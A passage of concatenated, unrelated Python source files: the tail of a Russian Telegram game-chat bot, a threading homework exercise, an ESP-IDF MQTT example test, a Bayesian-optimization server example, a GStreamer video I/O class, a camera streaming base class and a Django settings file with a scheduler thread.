bot.send_message(message.chat.id, 'Живее всех живых')
@bot.message_handler(commands=['random'])
def get_random(message):
try:
random.seed(message.message_id)
digit = message.text.lower()[7:].strip()
if digit.isdigit() and int(digit) > 0:
bot.send_message(message.chat.id, str(random.randint(1, int(digit))),
reply_to_message_id=message.message_id)
else:
bot.send_message(message.chat.id, 'Параметр не является числом, либо он меньше 1',
reply_to_message_id=message.message_id)
except:
print("don't get_random. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
# @bot.message_handler(func=all_castle_bigpisi, commands=['add_trigger'])
@bot.message_handler(commands=['add_trigger'])
def add_trigger(message):
try:
if message.reply_to_message:
if len(message.text.lower()[13:]) >= 3: # and is_good_name_for_trigger(message.text.lower()):
db = DataBase()
if not db.is_trigger(message.text.lower()[13:], message.chat.id):
                    # add the trigger to the DB
if message.reply_to_message.sticker:
data = [message.text.lower()[13:], message.reply_to_message.sticker.file_id, "sticker",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.photo:
data = [message.text.lower()[13:], message.reply_to_message.photo[0].file_id, "photo",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.video:
data = [message.text.lower()[13:], message.reply_to_message.video.file_id, "video",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.voice:
data = [message.text.lower()[13:], message.reply_to_message.voice.file_id, "voice",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.audio:
data = [message.text.lower()[13:], message.reply_to_message.audio.file_id, "audio",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.document:
data = [message.text.lower()[13:], message.reply_to_message.document.file_id, "document",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.video_note:
data = [message.text.lower()[13:], message.reply_to_message.video_note.file_id, "video_note",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.text:
data = [message.text.lower()[13:], message.reply_to_message.text, "text",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
bot.send_message(message.chat.id, "Триггер '" + message.text[13:] + "' добавлен.")
else:
bot.send_message(message.chat.id, "Триггер '" + message.text[13:] + "' уже занесен в базу.")
db.close()
else:
bot.send_message(message.chat.id, "Неккоректное имя триггера менее 3 символов")
else:
bot.send_message(message.chat.id, "Нет реплейнутого сообщения.")
except:
db.close()
print("don't add_trigger. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(commands=['del_trigger'])
def del_trigger(message):
try:
db = DataBase()
        if db.is_trigger(message.text.lower()[13:], message.chat.id):  # if the trigger exists
            db.delete_trigger(message.text.lower()[13:], message.chat.id)  # delete it
bot.send_message(message.chat.id, "Триггер '" + message.text[13:] + "' удалён.")
else:
bot.send_message(message.chat.id, "Триггера '" + message.text[13:] + "' не существует.")
db.close()
except:
db.close()
print("don't del_trigger. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
# @bot.message_handler(content_types=['sticker'])
# def get_info_about_messages(message):
# print(message)
# def is_good_name_for_trigger(text):
# match = re.match('^[а-яА-ЯёЁa-zA-Z0-9]+$', text)
# return bool(match)
def find_trigger_in_message(message):
print(message)
try:
# if is_good_name_for_trigger(message.text.lower()):
db = DataBase()
response = db.is_trigger(message.text.lower(), message.chat.id)
if response:
trigger_type = ''.join(response[0][0])
trigger_value = ''.join(response[0][1])
if trigger_type == "text":
bot.send_message(message.chat.id, trigger_value)
elif trigger_type == "sticker":
bot.send_sticker(message.chat.id, trigger_value)
elif trigger_type == "voice":
bot.send_voice(message.chat.id, trigger_value)
elif trigger_type == "audio":
bot.send_audio(message.chat.id, trigger_value)
elif trigger_type == "video":
bot.send_video(message.chat.id, trigger_value)
elif trigger_type == "document":
bot.send_document(message.chat.id, trigger_value)
elif trigger_type == "photo":
bot.send_photo(message.chat.id, trigger_value)
elif trigger_type == "video_note":
bot.send_video_note(message.chat.id, trigger_value)
        elif message.text.lower() == "список триггеров":
            query = db.get_trigger_list(message.chat.id)
            result = '\n'.join('.'.join(map(str, s)) for s in query)
            bot.send_message(message.chat.id, '<u><b>Список триггеров:</b></u>\n' + result, parse_mode='HTML')
db.close()
except:
print("don't find_trigger_in_message. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(content_types=['sticker'])
def congratulation_level_up(message):
if message.sticker.set_name == 'ChatwarsLevels':
bot.send_message(message.chat.id, text="Грац! Совсем большой стал, @{0}!".format(message.from_user.username,
reply_to_message_id=message.message_id))
elif message.sticker.set_name == 'ChatwarsLevelsF':
bot.send_message(message.chat.id, text="Грац! Совсем большая стала, @{0}!".format(message.from_user.username,
reply_to_message_id=message.message_id))
@bot.message_handler(content_types=['text'])
def get_text_messages(message):
print(message.chat.id)
if message.forward_from is None:
find_trigger_in_message(message)
if message.forward_from is not None and message.forward_from.id == cw_ID and re.search("встреча",
message.text.lower()):
data = [message.message_id, message.forward_date, message.from_user.id, message.from_user.username,
message.chat.id]
data.extend(get_about_msg(message.text))
data.append(message.date)
db = DataBase()
response = db.select_data_fight_ambush_result(data) # 'forward_date': 1605379349
# if len(response) == 0:
if not response:
db.insert_data_fight_ambush_result(data)
else:
bot.send_message(message.chat.id, text="Репорт уже занесен в базу",
reply_to_message_id=message.message_id)
# print(message)
if message.forward_from is not None and message.forward_from.id == cw_ID and re.search("враждебных существ",
message.text.lower()):
# (datetime.utcfromtimestamp(int(message.forward_date)).strftime('%Y-%m-%d %H:%M:%S'))
msg_date = datetime.utcfromtimestamp(int(message.forward_date))
        date_now = datetime.utcnow()
add_time = 3 * 60 # * 600
if re.search("ambush", message.text.lower()):
add_time = 5 * 60
if msg_date + timedelta(seconds=add_time) > date_now:
bot.pin_chat_message(message.chat.id, message.message_id)
####################################
text = message.text
fight = text[text.find('/fight'):len(text)]
btn_fight = get_two_button_fight(fight)
delta = msg_date + timedelta(seconds=add_time) - date_now
msg = bot.send_message(message.chat.id, text="<u><b>Killer's Ambush</b></u>" + "\n\nTime left "
+ '{:02}:{:02}'.format(delta.seconds // 60,
delta.seconds % 60),
reply_markup=btn_fight, parse_mode='HTML')
thread_timer = threading.Thread(target=check_send_messages, args=(delta.seconds, 10, msg, btn_fight))
thread_timer.daemon = False
thread_timer.start()
else:
bot.pin_chat_message(message.chat.id, message.message_id)
unpin_message(message)
# return info from message.text
# [msg.message.message_id, msg.from_user.id,msg.from_user.username, msg.chat.id]
def get_about_msg(txt):
try:
        exp = re.search(r'Exp:.*?(\d+)', txt)
        gold = re.search(r'Gold:.*?(\d+)', txt)
        stock = re.search(r'Stock:.*?(\d+)', txt)
        hp = re.search(r'Hp:.*?(-?\d+)', txt)
        last_hit = re.search(r'Ластхит:.*?(\d+)', txt)
        knockout = re.search(r'В нокауте:.*?(\d+)', txt)
        print(exp, gold, stock, hp, last_hit, knockout)
exp = int(exp.group(1)) if exp else 0
gold = int(gold.group(1)) if gold else 0
stock = int(stock.group(1)) if stock else 0
hp = int(hp.group(1)) if hp else 0
last_hit = int(last_hit.group(1)) if last_hit else 0
knockout = int(knockout.group(1)) if knockout else 0
return [exp, gold, stock, hp, last_hit, knockout]
except:
print("don't get_about_msg. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
def unpin_message(message):
try:
bot.unpin_chat_message(message.chat.id)
bot.edit_message_text(chat_id=message.chat.id, message_id=message.message_id,
text="Сообщение устарело")
# global last_pinned_msg
# if last_pinned_msg is not None:
# bot.pin_chat_message(message.chat.id, last_pinned_msg.message_id)
# last_pinned_msg = None
except:
print("don't unpin_message ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
def get_two_button_fight(query):
keyboard = telebot.types.InlineKeyboardMarkup()
btn_1 = telebot.types.InlineKeyboardButton(text="SendToCW", switch_inline_query=query)
btn_2 = telebot.types.InlineKeyboardButton(text="GoFight", callback_data=query)
keyboard.add(btn_1, btn_2)
return keyboard
# updates the pinned ambush message on a timer and unpins it when time runs out
def check_send_messages(duration, dt, message, btn_fight):
while duration:
        # pause between checks to avoid hogging the CPU
time.sleep(dt)
duration -= dt
if duration < 0:
duration = 0
fight_user = get_user_fight_ambush(message.message_id)
bot.edit_message_text(chat_id=ADEPT_ID, message_id=message.message_id,
text="<u><b>Killer's Ambush</b></u>\n\n" + fight_user + "\n\nTime left "
+ '{:02}:{:02}'.format(duration // 60, duration % 60),
reply_markup=btn_fight, parse_mode='HTML')
unpin_message(message)
# A magnificent plan, Walter. Just brilliant, if I got it right. Reliable as a Swiss watch.
def get_user_fight_ambush(message_id):
try:
db = DataBase()
users = db.select_user_fight_ambush(message_id)
fight_user = '\n'.join('.'.join(map(str, s)) for s in users)
db.close()
return fight_user
except:
print("don't get_user_fight_ambush. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.callback_query_handler(func=lambda msg: re.search('fight', msg.data))
def callback_inline_first(msg):
try:
db = DataBase()
data = [msg.from_user.id, msg.message.message_id]
cur = db.select_data_fight_ambush(data)
if len(cur) > 0:
bot.answer_callback_query(msg.id, show_alert=True, text="НЕ тыкай больше")
else:
tmp = db.select_count_data_fight_ambush(msg.message.message_id)
if tmp[0][0] >= 4:
bot.answer_callback_query(msg.id, show_alert=True, text="В следующий раз доблестный воин")
else:
data = [msg.message.message_id, msg.from_user.id, msg.from_user.username, msg.message.chat.id]
db.insert_data_ambush(data)
fight_user = get_user_fight_ambush(msg.message.message_id)
bot.edit_message_text(chat_id=ADEPT_ID, message_id=msg.message.message_id,
text="<u><b>Killer's Ambush</b></u>\n\n" + fight_user + "\n\n" + msg.message.text[
-15:],
reply_markup=get_two_button_fight(msg.data),
parse_mode='HTML')
db.close()
except:
print("don't insert from callback_inline_first. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
schedule.every().monday.at("12:00").do(get_topchik)
#schedule.every().thursday.at("06:15").do(get_topchik)
schedule.every().day.at("13:00").do(go_to_arena)
schedule.every().day.at("00:55").do(ping_for_battle)
# schedule.every(1).minutes.do(ping_for_battle)
schedule.every().day.at("16:55").do(ping_for_battle)
schedule.every().day.at("08:55").do(ping_for_battle)
while True:
try:
bot.polling(none_stop=True, interval=1) # , timeout=20)
except:
bot.stop_polling()
time.sleep(5)
print("Бот пал. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
|
1194021_M. RIZKY_D4 TI - 3A_UTS SISTER.py
|
import logging
import multiprocessing
import threading
from time import sleep
from random import randrange
LOG_FORMAT = '%(asctime)s %(threadName)-17s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
foods = []
condition = threading.Condition()
num_chef = 3
chef = ['Chef 1', 'Chef 2', 'Chef 3']
synchronizerThreading = threading.Barrier(num_chef)
synchronizerMultiProc = multiprocessing.Barrier(num_chef)
class Consumer(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.kwargs = kwargs['kwargs']
def consume(self):
with condition:
if len(foods) == 0:
logging.info('Tidak ada makanan yang di makan, status : {}'.format(self.kwargs["stat3"]))
condition.wait()
foods.pop()
logging.info('Memakan 1 makanan, status : {}'.format(self.kwargs["stat1"]))
condition.notify()
def run(self):
        for i in range(20):  # match the producer's 20 items; 21 would wait forever on the last pop
sleep(2)
self.consume()
class Producer(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.kwargs = kwargs['kwargs']
def produce(self):
with condition:
if len(foods) == 10:
                logging.info('Total makanan dibuat {}. Berhenti, status : {}'.format(len(foods), self.kwargs['stat2']))
condition.wait()
foods.append(1)
logging.info('Total makanan {}'.format(len(foods)))
condition.notify()
def run(self):
for i in range(20):
sleep(0.5)
self.produce()
def chef_challengeThread():
name = chef.pop()
sleep(randrange(2, 5))
print('%s menyelesaikan lomba Thread ' % (name))
synchronizerThreading.wait()
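# Note: Barrier(num_chef) blocks each wait() caller until num_chef parties have
# arrived, then releases them all at once; the multiprocessing.Barrier below
# behaves the same way across processes.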
def chef_challengeMultiProc(synchronizerMultiProc, serializer):
name = multiprocessing.current_process().name
sleep(randrange(2, 5))
synchronizerMultiProc.wait()
with serializer:
print('%s menyelesaikan lomba Multi Proc ' % (name))
def main():
print('Lomba Masak Multi Proc Mulai')
    serializer = multiprocessing.Lock()  # one shared lock so the finishing prints are serialized
    for i in range(num_chef):
        multiprocessing.Process(name=chef[i], target=chef_challengeMultiProc, args=(synchronizerMultiProc, serializer)).start()
threads = []
print('Lomba Masak Thread Mulai')
for i in range(num_chef):
threads.append(threading.Thread(target=chef_challengeThread))
threads[-1].start()
for thread in threads:
thread.join()
producer = Producer(name='Producer', kwargs={"stat1": 'Berhasil', "stat2": "Kepenuhan", "stat3": "Kosong"})
consumer = Consumer(name='Consumer', kwargs={"stat1": 'Berhasil', "stat2": "Kepenuhan", "stat3": "Kosong"})
producer.start()
consumer.start()
producer.join()
consumer.join()
if __name__ == "__main__":
main()
|
mqtt_tcp_example_test.py
|
import re
import os
import sys
import socket
from threading import Thread
import struct
import time
from tiny_test_fw import DUT
import ttfw_idf
msgid = -1
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def mqtt_server_sketch(my_ip, port):
global msgid
print("Starting the server on {}".format(my_ip))
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(60)
s.bind((my_ip, port))
s.listen(1)
q,addr = s.accept()
q.settimeout(30)
print("connection accepted")
except Exception:
print("Local server on {}:{} listening/accepting failure: {}"
"Possibly check permissions or firewall settings"
"to accept connections on this address".format(my_ip, port, sys.exc_info()[0]))
raise
data = q.recv(1024)
    # expect the client's CONNECT packet first
print("received from client {}".format(data))
data = bytearray([0x20, 0x02, 0x00, 0x00])
q.send(data)
# try to receive qos1
data = q.recv(1024)
msgid = struct.unpack(">H", data[15:17])[0]
print("received from client {}, msgid: {}".format(data, msgid))
data = bytearray([0x40, 0x02, data[15], data[16]])
q.send(data)
time.sleep(5)
s.close()
print("server closed")
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_qos1(env, extra_data):
    """
    steps: (QoS1: Happy flow)
    1. start the broker (with correctly sending ACK)
    2. DUT client connects to a broker and publishes qos1 message
    3. Test evaluates that qos1 message is queued and removed from the queue after ACK received
    4. Test the broker received the same message id evaluated in step 3
    """
    global msgid
dut1 = env.get_dut("mqtt_tcp", "examples/protocols/mqtt/tcp", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_tcp.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mqtt_tcp_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("mqtt_tcp_size", bin_size // 1024, dut1.TARGET)
# 1. start mqtt broker sketch
host_ip = get_my_ip()
    thread1 = Thread(target=mqtt_server_sketch, args=(host_ip, 1883))
thread1.start()
# 2. start the dut test and wait till client gets IP address
dut1.start_app()
# waiting for getting the IP address
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
print("writing to device: {}".format("mqtt://" + host_ip + "\n"))
dut1.write("mqtt://" + host_ip + "\n")
thread1.join()
print("Message id received from server: {}".format(msgid))
# 3. check the message id was enqueued and then deleted
msgid_enqueued = dut1.expect(re.compile(r"OUTBOX: ENQUEUE msgid=([0-9]+)"), timeout=30)
msgid_deleted = dut1.expect(re.compile(r"OUTBOX: DELETED msgid=([0-9]+)"), timeout=30)
# 4. check the msgid of received data are the same as that of enqueued and deleted from outbox
if (msgid_enqueued[0] == str(msgid) and msgid_deleted[0] == str(msgid)):
print("PASS: Received correct msg id")
else:
print("Failure!")
raise ValueError('Mismatch of msgid: received: {}, enqueued {}, deleted {}'.format(msgid, msgid_enqueued, msgid_deleted))
if __name__ == '__main__':
test_examples_protocol_mqtt_qos1()
|
async_optimization.py
|
import time
import random
from bayes_opt import BayesianOptimization
from bayes_opt.util import UtilityFunction, Colours
import asyncio
import threading
try:
import json
import tornado.ioloop
    import tornado.httpserver
    import tornado.escape  # json_decode is used in the handler below
from tornado.web import RequestHandler
import requests
except ImportError:
raise ImportError(
"In order to run this example you must have the libraries: " +
"`tornado` and `requests` installed."
)
def black_box_function(x, y):
"""Function with unknown internals we wish to maximize.
This is just serving as an example, however, for all intents and
purposes think of the internals of this function, i.e.: the process
which generates its outputs values, as unknown.
"""
time.sleep(random.randint(1, 7))
return -x ** 2 - (y - 1) ** 2 + 1
class BayesianOptimizationHandler(RequestHandler):
"""Basic functionality for NLP handlers."""
_bo = BayesianOptimization(
f=black_box_function,
pbounds={"x": (-4, 4), "y": (-3, 3)}
)
_uf = UtilityFunction(kind="ucb", kappa=3, xi=1)
def post(self):
"""Deal with incoming requests."""
body = tornado.escape.json_decode(self.request.body)
try:
self._bo.register(
x=body["params"],
target=body["target"],
)
print("BO has registered: {} points.".format(len(self._bo.space)), end="\n\n")
except KeyError:
pass
finally:
suggested_params = self._bo.suggest(self._uf)
self.write(json.dumps(suggested_params))
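# A request/response sketch for the handler above (hypothetical values): an empty
# body only asks for a suggestion; a filled body registers the observation first.
#   POST /bayesian_optimization {}                            -> {"x": 1.3, "y": -0.2}
#   POST /bayesian_optimization {"params": {"x": 1.3, "y": -0.2}, "target": -1.13}
#                                                             -> next suggested point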
def run_optimization_app():
asyncio.set_event_loop(asyncio.new_event_loop())
handlers = [
(r"/bayesian_optimization", BayesianOptimizationHandler),
]
server = tornado.httpserver.HTTPServer(
tornado.web.Application(handlers)
)
server.listen(9009)
tornado.ioloop.IOLoop.instance().start()
def run_optimizer():
global optimizers_config
config = optimizers_config.pop()
name = config["name"]
colour = config["colour"]
register_data = {}
max_target = None
for _ in range(10):
status = name + " wants to register: {}.\n".format(register_data)
resp = requests.post(
url="http://localhost:9009/bayesian_optimization",
json=register_data,
).json()
target = black_box_function(**resp)
register_data = {
"params": resp,
"target": target,
}
if max_target is None or target > max_target:
max_target = target
status += name + " got {} as target.\n".format(target)
status += name + " will to register next: {}.\n".format(register_data)
print(colour(status), end="\n")
global results
results.append((name, max_target))
print(colour(name + " is done!"), end="\n\n")
if __name__ == "__main__":
ioloop = tornado.ioloop.IOLoop.instance()
optimizers_config = [
{"name": "optimizer 1", "colour": Colours.red},
{"name": "optimizer 2", "colour": Colours.green},
{"name": "optimizer 3", "colour": Colours.blue},
]
app_thread = threading.Thread(target=run_optimization_app)
app_thread.daemon = True
app_thread.start()
targets = (
run_optimizer,
run_optimizer,
run_optimizer
)
optimizer_threads = []
for target in targets:
optimizer_threads.append(threading.Thread(target=target))
optimizer_threads[-1].daemon = True
optimizer_threads[-1].start()
results = []
for optimizer_thread in optimizer_threads:
optimizer_thread.join()
for result in results:
print(result[0], "found a maximum value of: {}".format(result[1]))
ioloop.stop()
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = True
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
"""
Class for capturing from a video file, an image sequence, or a camera, and saving video output.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame to output.
config : Dict
Camera and buffer configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
proc_fps : int
Estimated processing speed. This depends on compute and scene complexity.
"""
def __init__(self, size, config, input_uri, output_uri=None, proc_fps=30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.proc_fps = proc_fps
self.resolution = config['resolution']
self.frame_rate = config['frame_rate']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
self.is_live = self.protocol != Protocol.IMAGE and self.protocol != Protocol.VIDEO
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.is_live else 1 / self.cap_fps
def start_capture(self):
"""
Start capturing from file or device.
"""
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
def stop_capture(self):
"""
Stop capturing from file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s is-live=true ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if not self.is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
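# A minimal usage sketch (hypothetical input file and config values; the keys
# match those read in __init__ above):
if __name__ == '__main__':
    config = {'resolution': (1280, 720), 'frame_rate': 30, 'buffer_size': 10}
    stream = VideoIO((1280, 720), config, 'input.mp4', output_uri='out/result.mp4')
    stream.start_capture()
    while True:
        frame = stream.read()
        if frame is None:
            break
        stream.write(frame)
    stream.release()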
|
base_camera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
            if not event[0].is_set():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until first frame is available
BaseCamera.event.wait()
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
print('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
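# A minimal subclass sketch (synthetic frames; a real camera would yield encoded
# JPEG bytes from its capture device):
class DummyCamera(BaseCamera):
    @staticmethod
    def frames():
        while True:
            time.sleep(0.1)         # ~10 fps
            yield b'<frame bytes>'  # placeholder payload
# Clients would then call DummyCamera().get_frame() from their own threads.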
|
settings_20210906115137.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task to run once every day (currently at 11:50)
schedule.every().day.at("11:50").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(60)
t1 = threading.Thread(target=func)
t1.daemon = True  # don't let the scheduler thread block interpreter shutdown
t1.start()
